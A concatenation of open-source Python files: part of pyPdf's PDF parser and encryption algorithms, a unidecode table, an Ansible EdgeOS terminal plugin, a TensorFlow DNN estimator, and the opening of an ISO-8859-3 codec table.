_text = operands[2]
if isinstance(_text, TextStringObject):
text += "\n"
text += _text
elif operator == "TJ":
for i in operands[0]:
if isinstance(i, TextStringObject):
text += i
return text
##
# A rectangle (RectangleObject), expressed in default user space units,
# defining the boundaries of the physical medium on which the page is
# intended to be displayed or printed.
# <p>
# Stability: Added in v1.4, will exist for all future v1.x releases.
mediaBox = createRectangleAccessor("/MediaBox", ())
##
# A rectangle (RectangleObject), expressed in default user space units,
# defining the visible region of default user space. When the page is
# displayed or printed, its contents are to be clipped (cropped) to this
# rectangle and then imposed on the output medium in some
# implementation-defined manner. Default value: same as MediaBox.
# <p>
# Stability: Added in v1.4, will exist for all future v1.x releases.
cropBox = createRectangleAccessor("/CropBox", ("/MediaBox",))
##
# A rectangle (RectangleObject), expressed in default user space units,
# defining the region to which the contents of the page should be clipped
# when output in a production enviroment.
# <p>
# Stability: Added in v1.4, will exist for all future v1.x releases.
bleedBox = createRectangleAccessor("/BleedBox", ("/CropBox", "/MediaBox"))
##
# A rectangle (RectangleObject), expressed in default user space units,
# defining the intended dimensions of the finished page after trimming.
# <p>
# Stability: Added in v1.4, will exist for all future v1.x releases.
trimBox = createRectangleAccessor("/TrimBox", ("/CropBox", "/MediaBox"))
##
# A rectangle (RectangleObject), expressed in default user space units,
# defining the extent of the page's meaningful content as intended by the
# page's creator.
# <p>
# Stability: Added in v1.4, will exist for all future v1.x releases.
artBox = createRectangleAccessor("/ArtBox", ("/CropBox", "/MediaBox"))
class ContentStream(DecodedStreamObject):
def __init__(self, stream, pdf):
self.pdf = pdf
self.operations = []
# stream may be a StreamObject or an ArrayObject containing
# multiple StreamObjects to be cat'd together.
stream = stream.getObject()
if isinstance(stream, ArrayObject):
data = ""
for s in stream:
data += s.getObject().getData()
stream = StringIO(data)
else:
stream = StringIO(stream.getData())
self.__parseContentStream(stream)
def __parseContentStream(self, stream):
# file("f:\\tmp.txt", "w").write(stream.read())
stream.seek(0, 0)
operands = []
while True:
peek = readNonWhitespace(stream)
if peek == '':
break
stream.seek(-1, 1)
if peek.isalpha() or peek == "'" or peek == '"':
operator = ""
while True:
tok = stream.read(1)
if tok.isspace() or tok in NameObject.delimiterCharacters:
stream.seek(-1, 1)
break
elif tok == '':
break
operator += tok
if operator == "BI":
# begin inline image - a completely different parsing
# mechanism is required, of course... thanks buddy...
assert operands == []
ii = self._readInlineImage(stream)
self.operations.append((ii, "INLINE IMAGE"))
else:
self.operations.append((operands, operator))
operands = []
elif peek == '%':
# If we encounter a comment in the content stream, we have to
# handle it here. Typically, readObject will handle
# encountering a comment -- but readObject assumes that
# following the comment must be the object we're trying to
# read. In this case, it could be an operator instead.
while peek not in ('\r', '\n'):
peek = stream.read(1)
else:
operands.append(readObject(stream, None))
def _readInlineImage(self, stream):
# begin reading just after the "BI" - begin image
# first read the dictionary of settings.
settings = DictionaryObject()
while True:
tok = readNonWhitespace(stream)
stream.seek(-1, 1)
if tok == "I":
# "ID" - begin of image data
break
key = readObject(stream, self.pdf)
tok = readNonWhitespace(stream)
stream.seek(-1, 1)
value = readObject(stream, self.pdf)
settings[key] = value
# left at beginning of ID
tmp = stream.read(3)
assert tmp[:2] == "ID"
data = ""
while True:
tok = stream.read(1)
if tok == "E":
next = stream.read(1)
if next == "I":
break
else:
stream.seek(-1, 1)
data += tok
else:
data += tok
x = readNonWhitespace(stream)
stream.seek(-1, 1)
return {"settings": settings, "data": data}
def _getData(self):
newdata = StringIO()
for operands,operator in self.operations:
if operator == "INLINE IMAGE":
newdata.write("BI")
dicttext = StringIO()
operands["settings"].writeToStream(dicttext, None)
newdata.write(dicttext.getvalue()[2:-2])
newdata.write("ID ")
newdata.write(operands["data"])
newdata.write("EI")
else:
for op in operands:
op.writeToStream(newdata, None)
newdata.write(" ")
newdata.write(operator)
newdata.write("\n")
return newdata.getvalue()
def _setData(self, value):
self.__parseContentStream(StringIO(value))
_data = property(_getData, _setData)
##
# A class representing the basic document metadata provided in a PDF File.
# <p>
# As of pyPdf v1.10, all text properties of the document metadata have two
# properties, eg. author and author_raw. The non-raw property will always
# return a TextStringObject, making it ideal for a case where the metadata is
# being displayed. The raw property can sometimes return a ByteStringObject,
# if pyPdf was unable to decode the string's text encoding; this requires
# additional safety in the caller and therefore is not as commonly accessed.
class DocumentInformation(DictionaryObject):
def __init__(self):
DictionaryObject.__init__(self)
def getText(self, key):
retval = self.get(key, None)
if isinstance(retval, TextStringObject):
return retval
return None
##
# Read-only property accessing the document's title. Added in v1.6, will
# exist for all future v1.x releases. Modified in v1.10 to always return a
# unicode string (TextStringObject).
# @return A unicode string, or None if the title is not provided.
title = property(lambda self: self.getText("/Title"))
title_raw = property(lambda self: self.get("/Title"))
##
# Read-only property accessing the document's author. Added in v1.6, will
# exist for all future v1.x releases. Modified in v1.10 to always return a
# unicode string (TextStringObject).
# @return A unicode string, or None if the author is not provided.
author = property(lambda self: self.getText("/Author"))
author_raw = property(lambda self: self.get("/Author"))
##
# Read-only property accessing the subject of the document. Added in v1.6,
# will exist for all future v1.x releases. Modified in v1.10 to always
# return a unicode string (TextStringObject).
# @return A unicode string, or None if the subject is not provided.
subject = property(lambda self: self.getText("/Subject"))
subject_raw = property(lambda self: self.get("/Subject"))
##
# Read-only property accessing the document's creator. If the document was
# converted to PDF from another format, the name of the application (for
# example, OpenOffice) that created the original document from which it was
# converted. Added in v1.6, will exist for all future v1.x releases.
# Modified in v1.10 to always return a unicode string (TextStringObject).
# @return A unicode string, or None if the creator is not provided.
creator = property(lambda self: self.getText("/Creator"))
creator_raw = property(lambda self: self.get("/Creator"))
##
# Read-only property accessing the document's producer. If the document
# was converted to PDF from another format, the name of the application
# (for example, OSX Quartz) that converted it to PDF. Added in v1.6, will
# exist for all future v1.x releases. Modified in v1.10 to always return a
# unicode string (TextStringObject).
# @return A unicode string, or None if the producer is not provided.
producer = property(lambda self: self.getText("/Producer"))
producer_raw = property(lambda self: self.get("/Producer"))
##
# A class representing a destination within a PDF file.
# See section 8.2.1 of the PDF 1.6 reference.
# Stability: Added in v1.10, will exist for all v1.x releases.
class Destination(DictionaryObject):
def __init__(self, title, page, typ, *args):
DictionaryObject.__init__(self)
self[NameObject("/Title")] = title
self[NameObject("/Page")] = page
self[NameObject("/Type")] = typ
# from table 8.2 of the PDF 1.6 reference.
if typ == "/XYZ":
(self[NameObject("/Left")], self[NameObject("/Top")],
self[NameObject("/Zoom")]) = args
elif typ == "/FitR":
(self[NameObject("/Left")], self[NameObject("/Bottom")],
self[NameObject("/Right")], self[NameObject("/Top")]) = args
elif typ in ["/FitH", "FitBH"]:
self[NameObject("/Top")], = args
elif typ in ["/FitV", "FitBV"]:
self[NameObject("/Left")], = args
elif typ in ["/Fit", "FitB"]:
pass
else:
raise utils.PdfReadError("Unknown Destination Type: %r" % typ)
##
# Read-only property accessing the destination title.
# @return A string.
title = property(lambda self: self.get("/Title"))
##
# Read-only property accessing the destination page.
# @return An integer.
page = property(lambda self: self.get("/Page"))
##
# Read-only property accessing the destination type.
# @return A string.
typ = property(lambda self: self.get("/Type"))
##
# Read-only property accessing the zoom factor.
# @return A number, or None if not available.
zoom = property(lambda self: self.get("/Zoom", None))
##
# Read-only property accessing the left horizontal coordinate.
# @return A number, or None if not available.
left = property(lambda self: self.get("/Left", None))
##
# Read-only property accessing the right horizontal coordinate.
# @return A number, or None if not available.
right = property(lambda self: self.get("/Right", None))
##
# Read-only property accessing the top vertical coordinate.
# @return A number, or None if not available.
top = property(lambda self: self.get("/Top", None))
##
# Read-only property accessing the bottom vertical coordinate.
# @return A number, or None if not available.
bottom = property(lambda self: self.get("/Bottom", None))
def convertToInt(d, size):
if size > 8:
raise utils.PdfReadError("invalid size in convertToInt")
d = "\x00\x00\x00\x00\x00\x00\x00\x00" + d
d = d[-8:]
return struct.unpack(">q", d)[0]
# ref: pdf1.8 spec section 3.5.2 algorithm 3.2
_encryption_padding = '\x28\xbf\x4e\x5e\x4e\x75\x8a\x41\x64\x00\x4e\x56' + \
'\xff\xfa\x01\x08\x2e\x2e\x00\xb6\xd0\x68\x3e\x80\x2f\x0c' + \
'\xa9\xfe\x64\x53\x69\x7a'
# Implementation of algorithm 3.2 of the PDF standard security handler,
# section 3.5.2 of the PDF 1.6 reference.
def _alg32(password, rev, keylen, owner_entry, p_entry, id1_entry, metadata_encrypt=True):
# 1. Pad or truncate the password string to exactly 32 bytes. If the
# password string is more than 32 bytes long, use only its first 32 bytes;
# if it is less than 32 bytes long, pad it by appending the required number
# of additional bytes from the beginning of the padding string
# (_encryption_padding).
password = (password + _encryption_padding)[:32]
# 2. Initialize the MD5 hash function and pass the result of step 1 as
# input to this function.
import md5, struct
m = md5.new(password)
# 3. Pass the value of the encryption dictionary's /O entry to the MD5 hash
# function.
m.update(owner_entry)
# 4. Treat the value of the /P entry as an unsigned 4-byte integer and pass
# these bytes to the MD5 hash function, low-order byte first.
p_entry = struct.pack('<i', p_entry)
m.update(p_entry)
# 5. Pass the first element of the file's file identifier array to the MD5
# hash function.
m.update(id1_entry)
# 6. (Revision 3 or greater) If document metadata is not being encrypted,
# pass 4 bytes with the value 0xFFFFFFFF to the MD5 hash function.
if rev >= 3 and not metadata_encrypt:
m.update("\xff\xff\xff\xff")
# 7. Finish the hash.
md5_hash = m.digest()
# 8. (Revision 3 or greater) Do the following 50 times: Take the output
# from the previous MD5 hash and pass the first n bytes of the output as
# input into a new MD5 hash, where n is the number of bytes of the
# encryption key as defined by the value of the encryption dictionary's
# /Length entry.
if rev >= 3:
for i in range(50):
md5_hash = md5.new(md5_hash[:keylen]).digest()
# 9. Set the encryption key to the first n bytes of the output from the
# final MD5 hash, where n is always 5 for revision 2 but, for revision 3 or
# greater, depends on the value of the encryption dictionary's /Length
# entry.
return md5_hash[:keylen]
# Implementation of algorithm 3.3 of the PDF standard security handler,
# section 3.5.2 of the PDF 1.6 reference.
def _alg33(owner_pwd, user_pwd, rev, keylen):
# steps 1 - 4
key = _alg33_1(owner_pwd, rev, keylen)
# 5. Pad or truncate the user password string as described in step 1 of
# algorithm 3.2.
user_pwd = (user_pwd + _encryption_padding)[:32]
# 6. Encrypt the result of step 5, using an RC4 encryption function with
# the encryption key obtained in step 4.
val = utils.RC4_encrypt(key, user_pwd)
# 7. (Revision 3 or greater) Do the following 19 times: Take the output
# from the previous invocation of the RC4 function and pass it as input to
# a new invocation of the function; use an encryption key generated by
# taking each byte of the encryption key obtained in step 4 and performing
# an XOR operation between that byte and the single-byte value of the
# iteration counter (from 1 to 19).
if rev >= 3:
for i in range(1, 20):
new_key = ''
for l in range(len(key)):
new_key += chr(ord(key[l]) ^ i)
val = utils.RC4_encrypt(new_key, val)
# 8. Store the output from the final invocation of the RC4 as the value of
# the /O entry in the encryption dictionary.
return val
# Steps 1-4 of algorithm 3.3
def _alg33_1(password, rev, keylen):
# 1. Pad or truncate the owner password string as described in step 1 of
# algorithm 3.2. If there is no owner password, use the user password
# instead.
password = (password + _encryption_padding)[:32]
# 2. Initialize the MD5 hash function and pass the result of step 1 as
# input to this function.
import md5
m = md5.new(password)
# 3. (Revision 3 or greater) Do the following 50 times: Take the output
# from the previous MD5 hash and pass it as input into a new MD5 hash.
md5_hash = m.digest()
if rev >= 3:
for i in range(50):
md5_hash = md5.new(md5_hash).digest()
# 4. Create an RC4 encryption key using the first n bytes of the output
# from the final MD5 hash, where n is always 5 for revision 2 but, for
# revision 3 or greater, depends on the value of the encryption
# dictionary's /Length entry.
key = md5_hash[:keylen]
return key
# Implementation of algorithm 3.4 of the PDF standard security handler,
# section 3.5.2 of the PDF 1.6 reference.
def _alg34(password, owner_entry, p_entry, id1_entry):
# 1. Create an encryption key based on the user password string, as
# described in algorithm 3.2.
key = _alg32(password, 2, 5, owner_entry, p_entry, id1_entry)
# 2. Encrypt the 32-byte padding string shown in step 1 of algorithm 3.2,
# using an RC4 encryption function with the encryption key from the
# preceding step.
U = utils.RC4_encrypt(key, _encryption_padding)
# 3. Store the result of step 2 as the value of the /U entry in the
# encryption dictionary.
return U, key
# Implementation of algorithm 3.4 of the PDF standard security handler,
# section 3.5.2 of the PDF 1.6 reference.
def _alg35(password, rev, keylen, owner_entry, p_entry, id1_entry, metadata_encrypt):
# 1. Create an encryption key based on the user password string, as
# described in Algorithm 3.2.
key = _alg32(password, rev, keylen, owner_entry, p_entry, id1_entry)
# 2. Initialize the MD5 hash function and pass the 32-byte padding string
# shown in step 1 of Algorithm 3.2 as input to this function.
import md5
m = md5.new()
m.update(_encryption_padding)
# 3. Pass the first element of the file's file identifier array (the value
# of the ID entry in the document's trailer dictionary; see Table 3.13 on
# page 73) to the hash function and finish the hash. (See implementation
# note 25 in Appendix H.)
m.update(id1_entry)
md5_hash = m.digest()
# 4. Encrypt the 16-byte result of the hash, using an RC4 encryption
# function with the encryption key from step 1.
val = utils.RC4_encrypt(key, md5_hash)
# 5. Do the following 19 times: Take the output from the previous
# invocation of the RC4 function and pass it as input to a new invocation
# of the function; use an encryption key generated by taking each byte of
# the original encryption key (obtained in step 2) and performing an XOR
# operation between that byte and the single-byte value of the iteration
# counter (from 1 to 19).
for i in range(1, 20):
new_key = ''
for l in range(len(key)):
new_key += chr(ord(key[l]) ^ i)
val = utils.RC4_encrypt(new_key, val)
# 6. Append 16 bytes of arbitrary padding to the output from the final
# invocation of the RC4 function and store the 32-byte result as the value
# of the U entry in the encryption dictionary.
# (implementator note: I don't know what "arbitrary padding" is supposed to
# mean, so I have used null bytes. This seems to match a few other
# people's implementations)
return val + ('\x00' * 16), key
#if __name__ == "__main__":
# output = PdfFileWriter()
#
# input1 = PdfFileReader(file("test\\5000-s1-05e.pdf", "rb"))
# page1 = input1.getPage(0)
#
# input2 = PdfFileReader(file("test\\PDFReference16.pdf", "rb"))
# page2 = input2.getPage(0)
# page3 = input2.getPage(1)
# page1.mergePage(page2)
# page1.mergePage(page3)
#
# input3 = PdfFileReader(file("test\\cc-cc.pdf", "rb"))
# page1.mergePage(input3.getPage(0))
#
# page1.compressContentStreams()
#
# output.addPage(page1)
# output.write(file("test\\merge-test.pdf", "wb"))
| mit |
adaur/SickRage | lib/unidecode/x08f.py | 252 | 4651 | data = (
'Er ', # 0x00
'Qiong ', # 0x01
'Ju ', # 0x02
'Jiao ', # 0x03
'Guang ', # 0x04
'Lu ', # 0x05
'Kai ', # 0x06
'Quan ', # 0x07
'Zhou ', # 0x08
'Zai ', # 0x09
'Zhi ', # 0x0a
'She ', # 0x0b
'Liang ', # 0x0c
'Yu ', # 0x0d
'Shao ', # 0x0e
'You ', # 0x0f
'Huan ', # 0x10
'Yun ', # 0x11
'Zhe ', # 0x12
'Wan ', # 0x13
'Fu ', # 0x14
'Qing ', # 0x15
'Zhou ', # 0x16
'Ni ', # 0x17
'Ling ', # 0x18
'Zhe ', # 0x19
'Zhan ', # 0x1a
'Liang ', # 0x1b
'Zi ', # 0x1c
'Hui ', # 0x1d
'Wang ', # 0x1e
'Chuo ', # 0x1f
'Guo ', # 0x20
'Kan ', # 0x21
'Yi ', # 0x22
'Peng ', # 0x23
'Qian ', # 0x24
'Gun ', # 0x25
'Nian ', # 0x26
'Pian ', # 0x27
'Guan ', # 0x28
'Bei ', # 0x29
'Lun ', # 0x2a
'Pai ', # 0x2b
'Liang ', # 0x2c
'Ruan ', # 0x2d
'Rou ', # 0x2e
'Ji ', # 0x2f
'Yang ', # 0x30
'Xian ', # 0x31
'Chuan ', # 0x32
'Cou ', # 0x33
'Qun ', # 0x34
'Ge ', # 0x35
'You ', # 0x36
'Hong ', # 0x37
'Shu ', # 0x38
'Fu ', # 0x39
'Zi ', # 0x3a
'Fu ', # 0x3b
'Wen ', # 0x3c
'Ben ', # 0x3d
'Zhan ', # 0x3e
'Yu ', # 0x3f
'Wen ', # 0x40
'Tao ', # 0x41
'Gu ', # 0x42
'Zhen ', # 0x43
'Xia ', # 0x44
'Yuan ', # 0x45
'Lu ', # 0x46
'Jiu ', # 0x47
'Chao ', # 0x48
'Zhuan ', # 0x49
'Wei ', # 0x4a
'Hun ', # 0x4b
'Sori ', # 0x4c
'Che ', # 0x4d
'Jiao ', # 0x4e
'Zhan ', # 0x4f
'Pu ', # 0x50
'Lao ', # 0x51
'Fen ', # 0x52
'Fan ', # 0x53
'Lin ', # 0x54
'Ge ', # 0x55
'Se ', # 0x56
'Kan ', # 0x57
'Huan ', # 0x58
'Yi ', # 0x59
'Ji ', # 0x5a
'Dui ', # 0x5b
'Er ', # 0x5c
'Yu ', # 0x5d
'Xian ', # 0x5e
'Hong ', # 0x5f
'Lei ', # 0x60
'Pei ', # 0x61
'Li ', # 0x62
'Li ', # 0x63
'Lu ', # 0x64
'Lin ', # 0x65
'Che ', # 0x66
'Ya ', # 0x67
'Gui ', # 0x68
'Xuan ', # 0x69
'Di ', # 0x6a
'Ren ', # 0x6b
'Zhuan ', # 0x6c
'E ', # 0x6d
'Lun ', # 0x6e
'Ruan ', # 0x6f
'Hong ', # 0x70
'Ku ', # 0x71
'Ke ', # 0x72
'Lu ', # 0x73
'Zhou ', # 0x74
'Zhi ', # 0x75
'Yi ', # 0x76
'Hu ', # 0x77
'Zhen ', # 0x78
'Li ', # 0x79
'Yao ', # 0x7a
'Qing ', # 0x7b
'Shi ', # 0x7c
'Zai ', # 0x7d
'Zhi ', # 0x7e
'Jiao ', # 0x7f
'Zhou ', # 0x80
'Quan ', # 0x81
'Lu ', # 0x82
'Jiao ', # 0x83
'Zhe ', # 0x84
'Fu ', # 0x85
'Liang ', # 0x86
'Nian ', # 0x87
'Bei ', # 0x88
'Hui ', # 0x89
'Gun ', # 0x8a
'Wang ', # 0x8b
'Liang ', # 0x8c
'Chuo ', # 0x8d
'Zi ', # 0x8e
'Cou ', # 0x8f
'Fu ', # 0x90
'Ji ', # 0x91
'Wen ', # 0x92
'Shu ', # 0x93
'Pei ', # 0x94
'Yuan ', # 0x95
'Xia ', # 0x96
'Zhan ', # 0x97
'Lu ', # 0x98
'Che ', # 0x99
'Lin ', # 0x9a
'Xin ', # 0x9b
'Gu ', # 0x9c
'Ci ', # 0x9d
'Ci ', # 0x9e
'Pi ', # 0x9f
'Zui ', # 0xa0
'Bian ', # 0xa1
'La ', # 0xa2
'La ', # 0xa3
'Ci ', # 0xa4
'Xue ', # 0xa5
'Ban ', # 0xa6
'Bian ', # 0xa7
'Bian ', # 0xa8
'Bian ', # 0xa9
'[?] ', # 0xaa
'Bian ', # 0xab
'Ban ', # 0xac
'Ci ', # 0xad
'Bian ', # 0xae
'Bian ', # 0xaf
'Chen ', # 0xb0
'Ru ', # 0xb1
'Nong ', # 0xb2
'Nong ', # 0xb3
'Zhen ', # 0xb4
'Chuo ', # 0xb5
'Chuo ', # 0xb6
'Suberu ', # 0xb7
'Reng ', # 0xb8
'Bian ', # 0xb9
'Bian ', # 0xba
'Sip ', # 0xbb
'Ip ', # 0xbc
'Liao ', # 0xbd
'Da ', # 0xbe
'Chan ', # 0xbf
'Gan ', # 0xc0
'Qian ', # 0xc1
'Yu ', # 0xc2
'Yu ', # 0xc3
'Qi ', # 0xc4
'Xun ', # 0xc5
'Yi ', # 0xc6
'Guo ', # 0xc7
'Mai ', # 0xc8
'Qi ', # 0xc9
'Za ', # 0xca
'Wang ', # 0xcb
'Jia ', # 0xcc
'Zhun ', # 0xcd
'Ying ', # 0xce
'Ti ', # 0xcf
'Yun ', # 0xd0
'Jin ', # 0xd1
'Hang ', # 0xd2
'Ya ', # 0xd3
'Fan ', # 0xd4
'Wu ', # 0xd5
'Da ', # 0xd6
'E ', # 0xd7
'Huan ', # 0xd8
'Zhe ', # 0xd9
'Totemo ', # 0xda
'Jin ', # 0xdb
'Yuan ', # 0xdc
'Wei ', # 0xdd
'Lian ', # 0xde
'Chi ', # 0xdf
'Che ', # 0xe0
'Ni ', # 0xe1
'Tiao ', # 0xe2
'Zhi ', # 0xe3
'Yi ', # 0xe4
'Jiong ', # 0xe5
'Jia ', # 0xe6
'Chen ', # 0xe7
'Dai ', # 0xe8
'Er ', # 0xe9
'Di ', # 0xea
'Po ', # 0xeb
'Wang ', # 0xec
'Die ', # 0xed
'Ze ', # 0xee
'Tao ', # 0xef
'Shu ', # 0xf0
'Tuo ', # 0xf1
'Kep ', # 0xf2
'Jing ', # 0xf3
'Hui ', # 0xf4
'Tong ', # 0xf5
'You ', # 0xf6
'Mi ', # 0xf7
'Beng ', # 0xf8
'Ji ', # 0xf9
'Nai ', # 0xfa
'Yi ', # 0xfb
'Jie ', # 0xfc
'Zhui ', # 0xfd
'Lie ', # 0xfe
'Xun ', # 0xff
)
| gpl-3.0 |
nhicher/ansible | lib/ansible/plugins/terminal/edgeos.py | 87 | 1126 | # Copyright: (c) 2018, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import re
from ansible.plugins.terminal import TerminalBase
from ansible.errors import AnsibleConnectionFailure
class TerminalModule(TerminalBase):
terminal_stdout_re = [
re.compile(br"[\r\n]?[\w+\-\.:\/\[\]]+(?:\([^\)]+\)){,3}(?:>|#) ?$"),
re.compile(br"\@[\w\-\.]+:\S+?[>#\$] ?$")
]
terminal_stderr_re = [
re.compile(br"\n\s*command not found"),
re.compile(br"\nInvalid command"),
re.compile(br"\nCommit failed"),
re.compile(br"\n\s*Set failed"),
]
terminal_length = os.getenv('ANSIBLE_EDGEOS_TERMINAL_LENGTH', 10000)
def on_open_shell(self):
try:
self._exec_cli_command('export VYATTA_PAGER=cat')
self._exec_cli_command('stty rows %s' % self.terminal_length)
except AnsibleConnectionFailure:
raise AnsibleConnectionFailure('unable to set terminal parameters')
| gpl-3.0 |
meteorcloudy/tensorflow | tensorflow/contrib/estimator/python/estimator/dnn.py | 1 | 6739 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Deep Neural Network estimators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.estimator import estimator
from tensorflow.python.estimator.canned import dnn as dnn_lib
from tensorflow.python.ops import nn
class DNNEstimator(estimator.Estimator):
"""An estimator for TensorFlow DNN models with user-specified head.
Example:
```python
sparse_feature_a = sparse_column_with_hash_bucket(...)
sparse_feature_b = sparse_column_with_hash_bucket(...)
sparse_feature_a_emb = embedding_column(sparse_id_column=sparse_feature_a,
...)
sparse_feature_b_emb = embedding_column(sparse_id_column=sparse_feature_b,
...)
estimator = DNNEstimator(
head=tf.contrib.estimator.multi_label_head(n_classes=3),
feature_columns=[sparse_feature_a_emb, sparse_feature_b_emb],
hidden_units=[1024, 512, 256])
# Or estimator using the ProximalAdagradOptimizer optimizer with
# regularization.
estimator = DNNEstimator(
head=tf.contrib.estimator.multi_label_head(n_classes=3),
feature_columns=[sparse_feature_a_emb, sparse_feature_b_emb],
hidden_units=[1024, 512, 256],
optimizer=tf.train.ProximalAdagradOptimizer(
learning_rate=0.1,
l1_regularization_strength=0.001
))
# Or estimator using an optimizer with a learning rate decay.
estimator = DNNEstimator(
head=tf.contrib.estimator.multi_label_head(n_classes=3),
feature_columns=[sparse_feature_a_emb, sparse_feature_b_emb],
hidden_units=[1024, 512, 256],
optimizer=lambda: tf.AdamOptimizer(
learning_rate=tf.exponential_decay(
learning_rate=0.1,
global_step=tf.get_global_step(),
decay_steps=10000,
decay_rate=0.96))
# Or estimator with warm-starting from a previous checkpoint.
estimator = DNNEstimator(
head=tf.contrib.estimator.multi_label_head(n_classes=3),
feature_columns=[sparse_feature_a_emb, sparse_feature_b_emb],
hidden_units=[1024, 512, 256],
warm_start_from="/path/to/checkpoint/dir")
# Input builders
def input_fn_train: # returns x, y
pass
estimator.train(input_fn=input_fn_train, steps=100)
def input_fn_eval: # returns x, y
pass
metrics = estimator.evaluate(input_fn=input_fn_eval, steps=10)
def input_fn_predict: # returns x, None
pass
predictions = estimator.predict(input_fn=input_fn_predict)
```
Input of `train` and `evaluate` should have following features,
otherwise there will be a `KeyError`:
* if `weight_column` is not `None`, a feature with
`key=weight_column` whose value is a `Tensor`.
* for each `column` in `feature_columns`:
- if `column` is a `_CategoricalColumn`, a feature with `key=column.name`
whose `value` is a `SparseTensor`.
- if `column` is a `_WeightedCategoricalColumn`, two features: the first
with `key` the id column name, the second with `key` the weight column
name. Both features' `value` must be a `SparseTensor`.
- if `column` is a `_DenseColumn`, a feature with `key=column.name`
whose `value` is a `Tensor`.
Loss and predicted output are determined by the specified head.
"""
def __init__(self,
head,
hidden_units,
feature_columns,
model_dir=None,
optimizer='Adagrad',
activation_fn=nn.relu,
dropout=None,
input_layer_partitioner=None,
config=None,
warm_start_from=None):
"""Initializes a `DNNEstimator` instance.
Args:
head: A `_Head` instance constructed with a method such as
`tf.contrib.estimator.multi_label_head`.
hidden_units: Iterable of number hidden units per layer. All layers are
fully connected. Ex. `[64, 32]` means first layer has 64 nodes and
second one has 32.
feature_columns: An iterable containing all the feature columns used by
the model. All items in the set should be instances of classes derived
from `_FeatureColumn`.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator to
continue training a previously saved model.
optimizer: An instance of `tf.Optimizer` used to train the model. Can also
be a string (one of 'Adagrad', 'Adam', 'Ftrl', 'RMSProp', 'SGD'), or
callable. Defaults to Adagrad optimizer.
activation_fn: Activation function applied to each layer. If `None`, will
use `tf.nn.relu`.
dropout: When not `None`, the probability we will drop out a given
coordinate.
input_layer_partitioner: Optional. Partitioner for input layer. Defaults
to `min_max_variable_partitioner` with `min_slice_size` 64 << 20.
config: `RunConfig` object to configure the runtime settings.
warm_start_from: A string filepath to a checkpoint to warm-start from, or
a `WarmStartSettings` object to fully configure warm-starting. If the
string filepath is provided instead of a `WarmStartSettings`, then all
weights are warm-started, and it is assumed that vocabularies and Tensor
names are unchanged.
"""
def _model_fn(features, labels, mode, config):
return dnn_lib._dnn_model_fn( # pylint: disable=protected-access
features=features,
labels=labels,
mode=mode,
head=head,
hidden_units=hidden_units,
feature_columns=tuple(feature_columns or []),
optimizer=optimizer,
activation_fn=activation_fn,
dropout=dropout,
input_layer_partitioner=input_layer_partitioner,
config=config)
super(DNNEstimator, self).__init__(
model_fn=_model_fn, model_dir=model_dir, config=config,
warm_start_from=warm_start_from)
| apache-2.0 |
damonkohler/sl4a | python/src/Lib/encodings/iso8859_3.py | 593 | 13345 | """ Python Character Mapping Codec iso8859_3 generated from 'MAPPINGS/ISO8859/8859-3.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='iso8859-3',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> NULL
u'\x01' # 0x01 -> START OF HEADING
u'\x02' # 0x02 -> START OF TEXT
u'\x03' # 0x03 -> END OF TEXT
u'\x04' # 0x04 -> END OF TRANSMISSION
u'\x05' # 0x05 -> ENQUIRY
u'\x06' # 0x06 -> ACKNOWLEDGE
u'\x07' # 0x07 -> BELL
u'\x08' # 0x08 -> BACKSPACE
u'\t' # 0x09 -> HORIZONTAL TABULATION
u'\n' # 0x0A -> LINE FEED
u'\x0b' # 0x0B -> VERTICAL TABULATION
u'\x0c' # 0x0C -> FORM FEED
u'\r' # 0x0D -> CARRIAGE RETURN
u'\x0e' # 0x0E -> SHIFT OUT
u'\x0f' # 0x0F -> SHIFT IN
u'\x10' # 0x10 -> DATA LINK ESCAPE
u'\x11' # 0x11 -> DEVICE CONTROL ONE
u'\x12' # 0x12 -> DEVICE CONTROL TWO
u'\x13' # 0x13 -> DEVICE CONTROL THREE
u'\x14' # 0x14 -> DEVICE CONTROL FOUR
u'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x16 -> SYNCHRONOUS IDLE
u'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x18 -> CANCEL
u'\x19' # 0x19 -> END OF MEDIUM
u'\x1a' # 0x1A -> SUBSTITUTE
u'\x1b' # 0x1B -> ESCAPE
u'\x1c' # 0x1C -> FILE SEPARATOR
u'\x1d' # 0x1D -> GROUP SEPARATOR
u'\x1e' # 0x1E -> RECORD SEPARATOR
u'\x1f' # 0x1F -> UNIT SEPARATOR
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
